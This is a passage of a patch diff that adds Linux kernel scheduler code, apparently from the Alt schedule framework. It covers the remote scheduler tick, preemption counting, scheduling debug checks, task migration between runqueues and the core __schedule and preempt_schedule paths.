++	 */
++	if (cpumask_test_cpu(cpu, &sched_sg_idle_mask) &&
++	    cpumask_andnot(&chk, cpu_online_mask, sched_idle_mask) &&
++	    cpumask_andnot(&chk, &chk, &sched_rq_pending_mask)) {
++		int i;
++
++		for_each_cpu_wrap(i, &chk, cpu) {
++			if (!cpumask_intersects(cpu_smt_mask(i), sched_idle_mask) &&
++			    sg_balance_trigger(i))
++				return;
++		}
++	}
++}
++#endif /* CONFIG_SCHED_SMT */
++
++#ifdef CONFIG_NO_HZ_FULL
++
++struct tick_work {
++	int			cpu;
++	atomic_t		state;
++	struct delayed_work	work;
++};
++/* Values for ->state, see diagram below. */
++#define TICK_SCHED_REMOTE_OFFLINE	0
++#define TICK_SCHED_REMOTE_OFFLINING	1
++#define TICK_SCHED_REMOTE_RUNNING	2
++
++/*
++ * State diagram for ->state:
++ *
++ *
++ *          TICK_SCHED_REMOTE_OFFLINE
++ *                    |   ^
++ *                    |   |
++ *                    |   | sched_tick_remote()
++ *                    |   |
++ *                    |   |
++ *                    +--TICK_SCHED_REMOTE_OFFLINING
++ *                    |   ^
++ *                    |   |
++ * sched_tick_start() |   | sched_tick_stop()
++ *                    |   |
++ *                    V   |
++ *          TICK_SCHED_REMOTE_RUNNING
++ *
++ *
++ * Other transitions get WARN_ON_ONCE(), except that sched_tick_remote()
++ * and sched_tick_start() are happy to leave the state in RUNNING.
++ */
++
++static struct tick_work __percpu *tick_work_cpu;
++
++static void sched_tick_remote(struct work_struct *work)
++{
++	struct delayed_work *dwork = to_delayed_work(work);
++	struct tick_work *twork = container_of(dwork, struct tick_work, work);
++	int cpu = twork->cpu;
++	struct rq *rq = cpu_rq(cpu);
++	struct task_struct *curr;
++	unsigned long flags;
++	u64 delta;
++	int os;
++
++	/*
++	 * Handle the tick only if it appears the remote CPU is running in full
++	 * dynticks mode. The check is racy by nature, but missing a tick or
++	 * having one too much is no big deal because the scheduler tick updates
++	 * statistics and checks timeslices in a time-independent way, regardless
++	 * of when exactly it is running.
++	 */
++	if (!tick_nohz_tick_stopped_cpu(cpu))
++		goto out_requeue;
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	curr = rq->curr;
++	if (cpu_is_offline(cpu))
++		goto out_unlock;
++
++	update_rq_clock(rq);
++	if (!is_idle_task(curr)) {
++		/*
++		 * Make sure the next tick runs within a reasonable
++		 * amount of time.
++		 */
++		delta = rq_clock_task(rq) - curr->last_ran;
++		WARN_ON_ONCE(delta > (u64)NSEC_PER_SEC * 3);
++	}
++	scheduler_task_tick(rq);
++
++	calc_load_nohz_remote(rq);
++out_unlock:
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++out_requeue:
++	/*
++	 * Run the remote tick once per second (1Hz). This arbitrary
++	 * frequency is large enough to avoid overload but short enough
++	 * to keep scheduler internal stats reasonably up to date.  But
++	 * first update state to reflect hotplug activity if required.
++	 */
++	os = atomic_fetch_add_unless(&twork->state, -1, TICK_SCHED_REMOTE_RUNNING);
++	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_OFFLINE);
++	if (os == TICK_SCHED_REMOTE_RUNNING)
++		queue_delayed_work(system_unbound_wq, dwork, HZ);
++}
++
++static void sched_tick_start(int cpu)
++{
++	int os;
++	struct tick_work *twork;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
++		return;
++
++	WARN_ON_ONCE(!tick_work_cpu);
++
++	twork = per_cpu_ptr(tick_work_cpu, cpu);
++	os = atomic_xchg(&twork->state, TICK_SCHED_REMOTE_RUNNING);
++	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_RUNNING);
++	if (os == TICK_SCHED_REMOTE_OFFLINE) {
++		twork->cpu = cpu;
++		INIT_DELAYED_WORK(&twork->work, sched_tick_remote);
++		queue_delayed_work(system_unbound_wq, &twork->work, HZ);
++	}
++}
++
++#ifdef CONFIG_HOTPLUG_CPU
++static void sched_tick_stop(int cpu)
++{
++	struct tick_work *twork;
++	int os;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
++		return;
++
++	WARN_ON_ONCE(!tick_work_cpu);
++
++	twork = per_cpu_ptr(tick_work_cpu, cpu);
++	/* There cannot be competing actions, but don't rely on stop-machine. */
++	os = atomic_xchg(&twork->state, TICK_SCHED_REMOTE_OFFLINING);
++	WARN_ON_ONCE(os != TICK_SCHED_REMOTE_RUNNING);
++	/* Don't cancel, as this would mess up the state machine. */
++}
++#endif /* CONFIG_HOTPLUG_CPU */
++
++int __init sched_tick_offload_init(void)
++{
++	tick_work_cpu = alloc_percpu(struct tick_work);
++	BUG_ON(!tick_work_cpu);
++	return 0;
++}
++
++#else /* !CONFIG_NO_HZ_FULL */
++static inline void sched_tick_start(int cpu) { }
++static inline void sched_tick_stop(int cpu) { }
++#endif
++
++#if defined(CONFIG_PREEMPTION) && (defined(CONFIG_DEBUG_PREEMPT) || \
++				defined(CONFIG_PREEMPT_TRACER))
++/*
++ * If the value passed in is equal to the current preempt count
++ * then we just disabled preemption. Start timing the latency.
++ */
++static inline void preempt_latency_start(int val)
++{
++	if (preempt_count() == val) {
++		unsigned long ip = get_lock_parent_ip();
++#ifdef CONFIG_DEBUG_PREEMPT
++		current->preempt_disable_ip = ip;
++#endif
++		trace_preempt_off(CALLER_ADDR0, ip);
++	}
++}
++
++void preempt_count_add(int val)
++{
++#ifdef CONFIG_DEBUG_PREEMPT
++	/*
++	 * Underflow?
++	 */
++	if (DEBUG_LOCKS_WARN_ON((preempt_count() < 0)))
++		return;
++#endif
++	__preempt_count_add(val);
++#ifdef CONFIG_DEBUG_PREEMPT
++	/*
++	 * Spinlock count overflowing soon?
++	 */
++	DEBUG_LOCKS_WARN_ON((preempt_count() & PREEMPT_MASK) >=
++				PREEMPT_MASK - 10);
++#endif
++	preempt_latency_start(val);
++}
++EXPORT_SYMBOL(preempt_count_add);
++NOKPROBE_SYMBOL(preempt_count_add);
++
++/*
++ * If the value passed in equals the current preempt count
++ * then we just enabled preemption. Stop timing the latency.
++ */
++static inline void preempt_latency_stop(int val)
++{
++	if (preempt_count() == val)
++		trace_preempt_on(CALLER_ADDR0, get_lock_parent_ip());
++}
++
++void preempt_count_sub(int val)
++{
++#ifdef CONFIG_DEBUG_PREEMPT
++	/*
++	 * Underflow?
++	 */
++	if (DEBUG_LOCKS_WARN_ON(val > preempt_count()))
++		return;
++	/*
++	 * Is the spinlock portion underflowing?
++	 */
++	if (DEBUG_LOCKS_WARN_ON((val < PREEMPT_MASK) &&
++			!(preempt_count() & PREEMPT_MASK)))
++		return;
++#endif
++
++	preempt_latency_stop(val);
++	__preempt_count_sub(val);
++}
++EXPORT_SYMBOL(preempt_count_sub);
++NOKPROBE_SYMBOL(preempt_count_sub);
++
++#else
++static inline void preempt_latency_start(int val) { }
++static inline void preempt_latency_stop(int val) { }
++#endif
++
++static inline unsigned long get_preempt_disable_ip(struct task_struct *p)
++{
++#ifdef CONFIG_DEBUG_PREEMPT
++	return p->preempt_disable_ip;
++#else
++	return 0;
++#endif
++}
++
++/*
++ * Print scheduling while atomic bug:
++ */
++static noinline void __schedule_bug(struct task_struct *prev)
++{
++	/* Save this before calling printk(), since that will clobber it */
++	unsigned long preempt_disable_ip = get_preempt_disable_ip(current);
++
++	if (oops_in_progress)
++		return;
++
++	printk(KERN_ERR "BUG: scheduling while atomic: %s/%d/0x%08x\n",
++		prev->comm, prev->pid, preempt_count());
++
++	debug_show_held_locks(prev);
++	print_modules();
++	if (irqs_disabled())
++		print_irqtrace_events(prev);
++	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)
++	    && in_atomic_preempt_off()) {
++		pr_err("Preemption disabled at:");
++		print_ip_sym(KERN_ERR, preempt_disable_ip);
++	}
++	check_panic_on_warn("scheduling while atomic");
++
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++
++/*
++ * Various schedule()-time debugging checks and statistics:
++ */
++static inline void schedule_debug(struct task_struct *prev, bool preempt)
++{
++#ifdef CONFIG_SCHED_STACK_END_CHECK
++	if (task_stack_end_corrupted(prev))
++		panic("corrupted stack end detected inside scheduler\n");
++
++	if (task_scs_end_corrupted(prev))
++		panic("corrupted shadow stack detected inside scheduler\n");
++#endif
++
++#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
++	if (!preempt && READ_ONCE(prev->__state) && prev->non_block_count) {
++		printk(KERN_ERR "BUG: scheduling in a non-blocking section: %s/%d/%i\n",
++			prev->comm, prev->pid, prev->non_block_count);
++		dump_stack();
++		add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++	}
++#endif
++
++	if (unlikely(in_atomic_preempt_off())) {
++		__schedule_bug(prev);
++		preempt_count_set(PREEMPT_DISABLED);
++	}
++	rcu_sleep_check();
++	SCHED_WARN_ON(ct_state() == CONTEXT_USER);
++
++	profile_hit(SCHED_PROFILING, __builtin_return_address(0));
++
++	schedstat_inc(this_rq()->sched_count);
++}
++
++/*
++ * Compile time debug macro
++ * #define ALT_SCHED_DEBUG
++ */
++
++#ifdef ALT_SCHED_DEBUG
++void alt_sched_debug(void)
++{
++	printk(KERN_INFO "sched: pending: 0x%04lx, idle: 0x%04lx, sg_idle: 0x%04lx\n",
++	       sched_rq_pending_mask.bits[0],
++	       sched_idle_mask->bits[0],
++	       sched_sg_idle_mask.bits[0]);
++}
++#else
++inline void alt_sched_debug(void) {}
++#endif
++
++#ifdef	CONFIG_SMP
++
++#ifdef CONFIG_PREEMPT_RT
++#define SCHED_NR_MIGRATE_BREAK 8
++#else
++#define SCHED_NR_MIGRATE_BREAK 32
++#endif
++
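++/*
++ * Bounds how many queued tasks a single take_other_rq_tasks() pass may
++ * examine; kept lower on PREEMPT_RT to limit the time spent with two
++ * runqueue locks held.
++ */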
++const_debug unsigned int sysctl_sched_nr_migrate = SCHED_NR_MIGRATE_BREAK;
++
++/*
++ * Migrate pending tasks in @rq to @dest_cpu
++ */
++static inline int
++migrate_pending_tasks(struct rq *rq, struct rq *dest_rq, const int dest_cpu)
++{
++	struct task_struct *p, *skip = rq->curr;
++	int nr_migrated = 0;
++	int nr_tries = min(rq->nr_running / 2, sysctl_sched_nr_migrate);
++
++	while (skip != rq->idle && nr_tries &&
++	       (p = sched_rq_next_task(skip, rq)) != rq->idle) {
++		skip = sched_rq_next_task(p, rq);
++		if (cpumask_test_cpu(dest_cpu, p->cpus_ptr)) {
++			__SCHED_DEQUEUE_TASK(p, rq, 0);
++			set_task_cpu(p, dest_cpu);
++			sched_task_sanity_check(p, dest_rq);
++			__SCHED_ENQUEUE_TASK(p, dest_rq, 0);
++			nr_migrated++;
++		}
++		nr_tries--;
++	}
++
++	return nr_migrated;
++}
++
++static inline int take_other_rq_tasks(struct rq *rq, int cpu)
++{
++	struct cpumask *topo_mask, *end_mask;
++
++	if (unlikely(!rq->online))
++		return 0;
++
++	if (cpumask_empty(&sched_rq_pending_mask))
++		return 0;
++
++	topo_mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
++	end_mask = per_cpu(sched_cpu_topo_end_mask, cpu);
++	do {
++		int i;
++		for_each_cpu_and(i, &sched_rq_pending_mask, topo_mask) {
++			int nr_migrated;
++			struct rq *src_rq;
++
++			src_rq = cpu_rq(i);
++			if (!do_raw_spin_trylock(&src_rq->lock))
++				continue;
++			spin_acquire(&src_rq->lock.dep_map,
++				     SINGLE_DEPTH_NESTING, 1, _RET_IP_);
++
++			if ((nr_migrated = migrate_pending_tasks(src_rq, rq, cpu))) {
++				src_rq->nr_running -= nr_migrated;
++				if (src_rq->nr_running < 2)
++					cpumask_clear_cpu(i, &sched_rq_pending_mask);
++
++				spin_release(&src_rq->lock.dep_map, _RET_IP_);
++				do_raw_spin_unlock(&src_rq->lock);
++
++				rq->nr_running += nr_migrated;
++				if (rq->nr_running > 1)
++					cpumask_set_cpu(cpu, &sched_rq_pending_mask);
++
++				cpufreq_update_util(rq, 0);
++
++				return 1;
++			}
++
++			spin_release(&src_rq->lock.dep_map, _RET_IP_);
++			do_raw_spin_unlock(&src_rq->lock);
++		}
++	} while (++topo_mask < end_mask);
++
++	return 0;
++}
++#endif
++
++/*
++ * Timeslices below RESCHED_NS are considered as good as expired as there's no
++ * point rescheduling when there's so little time left.
++ */
++static inline void check_curr(struct task_struct *p, struct rq *rq)
++{
++	if (unlikely(rq->idle == p))
++		return;
++
++	update_curr(rq, p);
++
++	if (p->time_slice < RESCHED_NS)
++		time_slice_expired(p, rq);
++}
++
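++/*
++ * choose_next_task - pick the task to run next on @rq
++ *
++ * Prefer the per-rq skip hint (typically set by yield) when another
++ * task is runnable, otherwise take the first queued task. If only the
++ * idle task remains, try pulling work from other runqueues via
++ * take_other_rq_tasks() before actually going idle.
++ */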
++static inline struct task_struct *
++choose_next_task(struct rq *rq, int cpu)
++{
++	struct task_struct *next;
++
++	if (unlikely(rq->skip)) {
++		next = rq_runnable_task(rq);
++		if (next == rq->idle) {
++#ifdef	CONFIG_SMP
++			if (!take_other_rq_tasks(rq, cpu)) {
++#endif
++				rq->skip = NULL;
++				schedstat_inc(rq->sched_goidle);
++				return next;
++#ifdef	CONFIG_SMP
++			}
++			next = rq_runnable_task(rq);
++#endif
++		}
++		rq->skip = NULL;
++#ifdef CONFIG_HIGH_RES_TIMERS
++		hrtick_start(rq, next->time_slice);
++#endif
++		return next;
++	}
++
++	next = sched_rq_first_task(rq);
++	if (next == rq->idle) {
++#ifdef	CONFIG_SMP
++		if (!take_other_rq_tasks(rq, cpu)) {
++#endif
++			schedstat_inc(rq->sched_goidle);
++			/*printk(KERN_INFO "sched: choose_next_task(%d) idle %px\n", cpu, next);*/
++			return next;
++#ifdef	CONFIG_SMP
++		}
++		next = sched_rq_first_task(rq);
++#endif
++	}
++#ifdef CONFIG_HIGH_RES_TIMERS
++	hrtick_start(rq, next->time_slice);
++#endif
++	/*printk(KERN_INFO "sched: choose_next_task(%d) next %px\n", cpu,
++	 * next);*/
++	return next;
++}
++
++/*
++ * Constants for the sched_mode argument of __schedule().
++ *
++ * The mode argument allows RT enabled kernels to differentiate a
++ * preemption from blocking on an 'sleeping' spin/rwlock. Note that
++ * SM_MASK_PREEMPT for !RT has all bits set, which allows the compiler to
++ * optimize the AND operation out and just check for zero.
++ */
++#define SM_NONE			0x0
++#define SM_PREEMPT		0x1
++#define SM_RTLOCK_WAIT		0x2
++
++#ifndef CONFIG_PREEMPT_RT
++# define SM_MASK_PREEMPT	(~0U)
++#else
++# define SM_MASK_PREEMPT	SM_PREEMPT
++#endif
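++
++/*
++ * For example, with !PREEMPT_RT the expression "sched_mode &
++ * SM_MASK_PREEMPT" reduces to "sched_mode", so the test in
++ * __schedule() compiles down to a plain non-zero check.
++ */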
++
++/*
++ * schedule() is the main scheduler function.
++ *
++ * The main means of driving the scheduler and thus entering this function are:
++ *
++ *   1. Explicit blocking: mutex, semaphore, waitqueue, etc.
++ *
++ *   2. TIF_NEED_RESCHED flag is checked on interrupt and userspace return
++ *      paths. For example, see arch/x86/entry_64.S.
++ *
++ *      To drive preemption between tasks, the scheduler sets the flag in timer
++ *      interrupt handler scheduler_tick().
++ *
++ *   3. Wakeups don't really cause entry into schedule(). They add a
++ *      task to the run-queue and that's it.
++ *
++ *      Now, if the new task added to the run-queue preempts the current
++ *      task, then the wakeup sets TIF_NEED_RESCHED and schedule() gets
++ *      called on the nearest possible occasion:
++ *
++ *       - If the kernel is preemptible (CONFIG_PREEMPTION=y):
++ *
++ *         - in syscall or exception context, at the next outmost
++ *           preempt_enable(). (this might be as soon as the wake_up()'s
++ *           spin_unlock()!)
++ *
++ *         - in IRQ context, return from interrupt-handler to
++ *           preemptible context
++ *
++ *       - If the kernel is not preemptible (CONFIG_PREEMPTION is not set)
++ *         then at the next:
++ *
++ *          - cond_resched() call
++ *          - explicit schedule() call
++ *          - return from syscall or exception to user-space
++ *          - return from interrupt-handler to user-space
++ *
++ * WARNING: must be called with preemption disabled!
++ */
++static void __sched notrace __schedule(unsigned int sched_mode)
++{
++	struct task_struct *prev, *next;
++	unsigned long *switch_count;
++	unsigned long prev_state;
++	struct rq *rq;
++	int cpu;
++	int deactivated = 0;
++
++	cpu = smp_processor_id();
++	rq = cpu_rq(cpu);
++	prev = rq->curr;
++
++	schedule_debug(prev, !!sched_mode);
++
++	/* bypass sched_feat(HRTICK) checking, which Alt schedule FW doesn't support */
++	hrtick_clear(rq);
++
++	local_irq_disable();
++	rcu_note_context_switch(!!sched_mode);
++
++	/*
++	 * Make sure that signal_pending_state()->signal_pending() below
++	 * can't be reordered with __set_current_state(TASK_INTERRUPTIBLE)
++	 * done by the caller to avoid the race with signal_wake_up():
++	 *
++	 * __set_current_state(@state)		signal_wake_up()
++	 * schedule()				  set_tsk_thread_flag(p, TIF_SIGPENDING)
++	 *					  wake_up_state(p, state)
++	 *   LOCK rq->lock			    LOCK p->pi_state
++	 *   smp_mb__after_spinlock()		    smp_mb__after_spinlock()
++	 *     if (signal_pending_state())	    if (p->state & @state)
++	 *
++	 * Also, the membarrier system call requires a full memory barrier
++	 * after coming from user-space, before storing to rq->curr.
++	 */
++	raw_spin_lock(&rq->lock);
++	smp_mb__after_spinlock();
++
++	update_rq_clock(rq);
++
++	switch_count = &prev->nivcsw;
++	/*
++	 * We must load prev->state once (task_struct::state is volatile), such
++	 * that we form a control dependency vs deactivate_task() below.
++	 */
++	prev_state = READ_ONCE(prev->__state);
++	if (!(sched_mode & SM_MASK_PREEMPT) && prev_state) {
++		if (signal_pending_state(prev_state, prev)) {
++			WRITE_ONCE(prev->__state, TASK_RUNNING);
++		} else {
++			prev->sched_contributes_to_load =
++				(prev_state & TASK_UNINTERRUPTIBLE) &&
++				!(prev_state & TASK_NOLOAD) &&
++				!(prev_state & TASK_FROZEN);
++
++			if (prev->sched_contributes_to_load)
++				rq->nr_uninterruptible++;
++
++			/*
++			 * __schedule()			ttwu()
++			 *   prev_state = prev->state;    if (p->on_rq && ...)
++			 *   if (prev_state)		    goto out;
++			 *     p->on_rq = 0;		  smp_acquire__after_ctrl_dep();
++			 *				  p->state = TASK_WAKING
++			 *
++			 * Where __schedule() and ttwu() have matching control dependencies.
++			 *
++			 * After this, schedule() must not care about p->state any more.
++			 */
++			sched_task_deactivate(prev, rq);
++			deactivate_task(prev, rq);
++			deactivated = 1;
++
++			if (prev->in_iowait) {
++				atomic_inc(&rq->nr_iowait);
++				delayacct_blkio_start();
++			}
++		}
++		switch_count = &prev->nvcsw;
++	}
++
++	check_curr(prev, rq);
++
++	next = choose_next_task(rq, cpu);
++	clear_tsk_need_resched(prev);
++	clear_preempt_need_resched();
++#ifdef CONFIG_SCHED_DEBUG
++	rq->last_seen_need_resched_ns = 0;
++#endif
++
++	if (likely(prev != next)) {
++		if (deactivated)
++			update_sched_preempt_mask(rq);
++		next->last_ran = rq->clock_task;
++		rq->last_ts_switch = rq->clock;
++
++		rq->nr_switches++;
++		/*
++		 * RCU users of rcu_dereference(rq->curr) may not see
++		 * changes to task_struct made by pick_next_task().
++		 */
++		RCU_INIT_POINTER(rq->curr, next);
++		/*
++		 * The membarrier system call requires each architecture
++		 * to have a full memory barrier after updating
++		 * rq->curr, before returning to user-space.
++		 *
++		 * Here are the schemes providing that barrier on the
++		 * various architectures:
++		 * - mm ? switch_mm() : mmdrop() for x86, s390, sparc, PowerPC.
++		 *   switch_mm() relies on membarrier_arch_switch_mm() on PowerPC.
++		 * - finish_lock_switch() for weakly-ordered
++		 *   architectures where spin_unlock is a full barrier,
++		 * - switch_to() for arm64 (weakly-ordered, spin_unlock
++		 *   is a RELEASE barrier),
++		 */
++		++*switch_count;
++
++		psi_sched_switch(prev, next, !task_on_rq_queued(prev));
++
++		trace_sched_switch(sched_mode & SM_MASK_PREEMPT, prev, next, prev_state);
++
++		/* Also unlocks the rq: */
++		rq = context_switch(rq, prev, next);
++	} else {
++		__balance_callbacks(rq);
++		raw_spin_unlock_irq(&rq->lock);
++	}
++
++#ifdef CONFIG_SCHED_SMT
++	sg_balance(rq);
++#endif
++}
++
++void __noreturn do_task_dead(void)
++{
++	/* Causes final put_task_struct in finish_task_switch(): */
++	set_special_state(TASK_DEAD);
++
++	/* Tell freezer to ignore us: */
++	current->flags |= PF_NOFREEZE;
++
++	__schedule(SM_NONE);
++	BUG();
++
++	/* Avoid "noreturn function does return" - but don't continue if BUG() is a NOP: */
++	for (;;)
++		cpu_relax();
++}
++
++static inline void sched_submit_work(struct task_struct *tsk)
++{
++	unsigned int task_flags;
++
++	if (task_is_running(tsk))
++		return;
++
++	task_flags = tsk->flags;
++	/*
++	 * If a worker goes to sleep, notify and ask workqueue whether it
++	 * wants to wake up a task to maintain concurrency.
++	 */
++	if (task_flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
++		if (task_flags & PF_WQ_WORKER)
++			wq_worker_sleeping(tsk);
++		else
++			io_wq_worker_sleeping(tsk);
++	}
++
++	/*
++	 * spinlock and rwlock must not flush block requests.  This will
++	 * deadlock if the callback attempts to acquire a lock which is
++	 * already acquired.
++	 */
++	SCHED_WARN_ON(current->__state & TASK_RTLOCK_WAIT);
++
++	/*
++	 * If we are going to sleep and we have plugged IO queued,
++	 * make sure to submit it to avoid deadlocks.
++	 */
++	blk_flush_plug(tsk->plug, true);
++}
++
++static void sched_update_worker(struct task_struct *tsk)
++{
++	if (tsk->flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
++		if (tsk->flags & PF_WQ_WORKER)
++			wq_worker_running(tsk);
++		else
++			io_wq_worker_running(tsk);
++	}
++}
++
++asmlinkage __visible void __sched schedule(void)
++{
++	struct task_struct *tsk = current;
++
++	sched_submit_work(tsk);
++	do {
++		preempt_disable();
++		__schedule(SM_NONE);
++		sched_preempt_enable_no_resched();
++	} while (need_resched());
++	sched_update_worker(tsk);
++}
++EXPORT_SYMBOL(schedule);
++
++/*
++ * synchronize_rcu_tasks() makes sure that no task is stuck in preempted
++ * state (have scheduled out non-voluntarily) by making sure that all
++ * tasks have either left the run queue or have gone into user space.
++ * As idle tasks do not do either, they must not ever be preempted
++ * (schedule out non-voluntarily).
++ *
++ * schedule_idle() is similar to schedule_preempt_disabled() except that it
++ * never enables preemption because it does not call sched_submit_work().
++ */
++void __sched schedule_idle(void)
++{
++	/*
++	 * As this skips calling sched_submit_work(), which the idle task does
++	 * regardless because that function is a nop when the task is in a
++	 * TASK_RUNNING state, make sure this isn't used someplace that the
++	 * current task can be in any other state. Note, idle is always in the
++	 * TASK_RUNNING state.
++	 */
++	WARN_ON_ONCE(current->__state);
++	do {
++		__schedule(SM_NONE);
++	} while (need_resched());
++}
++
++#if defined(CONFIG_CONTEXT_TRACKING_USER) && !defined(CONFIG_HAVE_CONTEXT_TRACKING_USER_OFFSTACK)
++asmlinkage __visible void __sched schedule_user(void)
++{
++	/*
++	 * If we come here after a random call to set_need_resched(),
++	 * or we have been woken up remotely but the IPI has not yet arrived,
++	 * we haven't yet exited the RCU idle mode. Do it here manually until
++	 * we find a better solution.
++	 *
++	 * NB: There are buggy callers of this function.  Ideally we
++	 * should warn if prev_state != CONTEXT_USER, but that will trigger
++	 * too frequently to make sense yet.
++	 */
++	enum ctx_state prev_state = exception_enter();
++	schedule();
++	exception_exit(prev_state);
++}
++#endif
++
++/**
++ * schedule_preempt_disabled - called with preemption disabled
++ *
++ * Returns with preemption disabled. Note: preempt_count must be 1
++ */
++void __sched schedule_preempt_disabled(void)
++{
++	sched_preempt_enable_no_resched();
++	schedule();
++	preempt_disable();
++}
++
++#ifdef CONFIG_PREEMPT_RT
++void __sched notrace schedule_rtlock(void)
++{
++	do {
++		preempt_disable();
++		__schedule(SM_RTLOCK_WAIT);
++		sched_preempt_enable_no_resched();
++	} while (need_resched());
++}
++NOKPROBE_SYMBOL(schedule_rtlock);
++#endif
++
++static void __sched notrace preempt_schedule_common(void)
++{
++	do {
++		/*
++		 * Because the function tracer can trace preempt_count_sub()
++		 * and it also uses preempt_enable/disable_notrace(), if
++		 * NEED_RESCHED is set, the preempt_enable_notrace() called
++		 * by the function tracer will call this function again and
++		 * cause infinite recursion.
++		 *
++		 * Preemption must be disabled here before the function
++		 * tracer can trace. Break up preempt_disable() into two
++		 * calls. One to disable preemption without fear of being
++		 * traced. The other to still record the preemption latency,
++		 * which can also be traced by the function tracer.
++		 */
++		preempt_disable_notrace();
++		preempt_latency_start(1);
++		__schedule(SM_PREEMPT);
++		preempt_latency_stop(1);
++		preempt_enable_no_resched_notrace();
++
++		/*
++		 * Check again in case we missed a preemption opportunity
++		 * between schedule and now.
++		 */
++	} while (need_resched());
++}
++
++#ifdef CONFIG_PREEMPTION
++/*
++ * This is the entry point to schedule() from in-kernel preemption
++ * off of preempt_enable.
++ */
++asmlinkage __visible void __sched notrace preempt_schedule(void)
++{
++	/*
++	 * If there is a non-zero preempt_count or interrupts are disabled,
++	 * we do not want to preempt the current task. Just return..
++	 */
++	if (likely(!preemptible()))
++		return;
++
++	preempt_schedule_common();
++}
++NOKPROBE_SYMBOL(preempt_schedule);
++EXPORT_SYMBOL(preempt_schedule);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#ifndef preempt_schedule_dynamic_enabled
++#define preempt_schedule_dynamic_enabled	preempt_schedule
++#define preempt_schedule_dynamic_disabled	NULL
++#endif
++DEFINE_STATIC_CALL(preempt_schedule, preempt_schedule_dynamic_enabled);
++EXPORT_STATIC_CALL_TRAMP(preempt_schedule);
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule);
++void __sched notrace dynamic_preempt_schedule(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule))
++		return;
++	preempt_schedule();
++}
++NOKPROBE_SYMBOL(dynamic_preempt_schedule);
++EXPORT_SYMBOL(dynamic_preempt_schedule);
++#endif
++#endif
++
++/**
++ * preempt_schedule_notrace - preempt_schedule called by tracing
++ *
++ * The tracing infrastructure uses preempt_enable_notrace to prevent
++ * recursion and tracing preempt enabling caused by the tracing
++ * infrastructure itself. But as tracing can happen in areas coming
++ * from userspace or just about to enter userspace, a preempt enable
++ * can occur before user_exit() is called. This will cause the scheduler
++ * to be called when the system is still in usermode.
++ *
++ * To prevent this, the preempt_enable_notrace will use this function
++ * instead of preempt_schedule() to exit user context if needed before
++ * calling the scheduler.
++ */
++asmlinkage __visible void __sched notrace preempt_schedule_notrace(void)
++{
++	enum ctx_state prev_ctx;
++
++	if (likely(!preemptible()))
++		return;
++
++	do {
++		/*
++		 * Because the function tracer can trace preempt_count_sub()
++		 * and it also uses preempt_enable/disable_notrace(), if
++		 * NEED_RESCHED is set, the preempt_enable_notrace() called
++		 * by the function tracer will call this function again and
++		 * cause infinite recursion.
++		 *
++		 * Preemption must be disabled here before the function
++		 * tracer can trace. Break up preempt_disable() into two
++		 * calls. One to disable preemption without fear of being
++		 * traced. The other to still record the preemption latency,
++		 * which can also be traced by the function tracer.
++		 */
++		preempt_disable_notrace();
++		preempt_latency_start(1);
++		/*
++		 * Needs preempt disabled in case user_exit() is traced
++		 * and the tracer calls preempt_enable_notrace() causing
++		 * an infinite recursion.
++		 */
++		prev_ctx = exception_enter();
++		__schedule(SM_PREEMPT);
++		exception_exit(prev_ctx);
++
++		preempt_latency_stop(1);
++		preempt_enable_no_resched_notrace();
++	} while (need_resched());
++}
++EXPORT_SYMBOL_GPL(preempt_schedule_notrace);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#ifndef preempt_schedule_notrace_dynamic_enabled
++#define preempt_schedule_notrace_dynamic_enabled	preempt_schedule_notrace
++#define preempt_schedule_notrace_dynamic_disabled	NULL
++#endif
++DEFINE_STATIC_CALL(preempt_schedule_notrace, preempt_schedule_notrace_dynamic_enabled);
++EXPORT_STATIC_CALL_TRAMP(preempt_schedule_notrace);
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule_notrace);
++void __sched notrace dynamic_preempt_schedule_notrace(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule_notrace))
++		return;
++	preempt_schedule_notrace();
++}
++NOKPROBE_SYMBOL(dynamic_preempt_schedule_notrace);
++EXPORT_SYMBOL(dynamic_preempt_schedule_notrace);
++#endif
++#endif
++
++#endif /* CONFIG_PREEMPTION */
++
++/*
++ * This is the entry point to schedule() from kernel preemption
++ * off of irq context.
++ * Note that this is called and returns with irqs disabled. This
++ * protects us against recursive calls from irq context.
++ */
++asmlinkage __visible void __sched preempt_schedule_irq(void)
++{
++	enum ctx_state prev_state;
++
++	/* Catch callers which need to be fixed */
++	BUG_ON(preempt_count() || !irqs_disabled());
++
++	prev_state = exception_enter();
++
++	do {
++		preempt_disable();
++		local_irq_enable();
++		__schedule(SM_PREEMPT);
++		local_irq_disable();
++		sched_preempt_enable_no_resched();
++	} while (need_resched());
++
++	exception_exit(prev_state);
++}
++
++int default_wake_function(wait_queue_entry_t *curr, unsigned mode, int wake_flags,
++			  void *key)
++{
++	WARN_ON_ONCE(IS_ENABLED(CONFIG_SCHED_DEBUG) && wake_flags & ~WF_SYNC);
++	return try_to_wake_up(curr->private, mode, wake_flags);
++}
++EXPORT_SYMBOL(default_wake_function);
++
++static inline void check_task_changed(struct task_struct *p, struct rq *rq)
++{
++	int idx;
++
++	/* Trigger resched if task sched_prio has been modified. */
++	if (task_on_rq_queued(p) && (idx = task_sched_prio_idx(p, rq)) != p->sq_idx) {
++		requeue_task(p, rq, idx);
++		check_preempt_curr(rq);
++	}
++}
++
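++/*
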